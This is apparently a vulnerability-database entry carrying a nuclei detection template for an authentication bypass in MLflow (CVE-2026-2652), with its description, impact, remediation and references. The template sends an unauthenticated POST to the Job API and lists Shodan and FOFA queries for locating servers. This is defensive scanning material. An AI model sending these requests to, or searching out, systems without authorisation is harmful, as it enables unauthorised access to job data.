Lucene search
K

MLflow < 3.10.0 - Authentication Bypass on FastAPI Routes

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 13 Views

Mlflow prior to 3.10.0 permits unauthenticated access to FastAPI routes under basic-auth, enabling job control and trace ingestion.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Huntr
Authentication Bypass on FastAPI Routes (Job API, OTel API) When Basic Auth Enabled
14 Feb 202602:13
huntr
ATTACKERKB
CVE-2026-2652
15 May 202602:13
attackerkb
Circl
CVE-2026-2652
4 Jun 202609:46
circl
CNNVD
MLflow 安全漏洞
15 May 202600:00
cnnvd
CVE
CVE-2026-2652
15 May 202602:13
cve
Cvelist
CVE-2026-2652 Authentication Bypass in mlflow/mlflow
15 May 202602:13
cvelist
EUVD
EUVD-2026-30499
15 May 202602:13
euvd
Github Security Blog
MLflow: unauthenticated access to certain FastAPI routes
15 May 202603:30
github
NVD
CVE-2026-2652
15 May 202603:16
nvd
OSV
BIT-MLFLOW-2026-2652 Authentication Bypass in mlflow/mlflow
19 May 202608:53
osv
Rows per page
id: CVE-2026-2652

info:
  name: MLflow < 3.10.0 - Authentication Bypass on FastAPI Routes
  author: DhiyaneshDk
  severity: high
  description: |
    A vulnerability in mlflow/mlflow versions 3.9.0 and earlier allows unauthenticated access to certain FastAPI routes when the server is started with authentication enabled (`--app-name basic-auth`) and served via uvicorn (ASGI). The FastAPI permission middleware only enforces authentication on `/gateway/` routes, leaving other routes such as the Job API (`/ajax-api/3.0/jobs/*`) and the OpenTelemetry trace ingestion API (`/v1/traces`) unprotected. This allows unauthenticated remote attackers to submit jobs, read job results, cancel running jobs, and inject arbitrary trace data into experiments. The issue arises from an architectural mismatch between Flask and FastAPI authentication mechanisms, where the `_find_fastapi_validator()` function fails to handle non-`/gateway/` paths, resulting in a complete authentication bypass. This vulnerability is fixed in version 3.10.0.
  impact: |
    An unauthenticated attacker can bypass authentication to access job management APIs and inject arbitrary trace data, potentially leading to data integrity compromise and unauthorized job execution.
  remediation: |
    Upgrade MLflow to version 3.10.0 or later.
  reference:
    - https://huntr.com/bounties/5aeff5f0-49c7-4180-b5cb-c9a046f16756
    - https://nvd.nist.gov/vuln/detail/CVE-2026-2652
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L
    cvss-score: 8.6
    cve-id: CVE-2026-2652
    epss-score: 0.01502
    epss-percentile: 0.71224
    cwe-id: CWE-306
    cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: lfprojects
    product: mlflow
    shodan-query: http.title:"mlflow"
    fofa-query: app="mlflow"
  tags: cve,cve2026,mlflow,auth-bypass,lfprojects,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /api/2.0/mlflow/experiments/list HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 401'
        internal: true

  - raw:
      - |
        POST /ajax-api/3.0/jobs/search HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, "\"jobs\":")
          - contains(content_type, 'application/json')
        condition: and
# digest: 4b0a00483046022100f20cb25d4bb79144e6c733a4ed1a0fa9644f4b010625ad38f7012e745278d6c3022100fcc4526e794245bf5786c2281978b11805f988861c6a8733a5d88b1d2ab38dca:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Jun 2026 09:46Current
7.4High risk
Vulners AI Score7.4
CVSS 38.6
EPSS0.01502
SSVC
13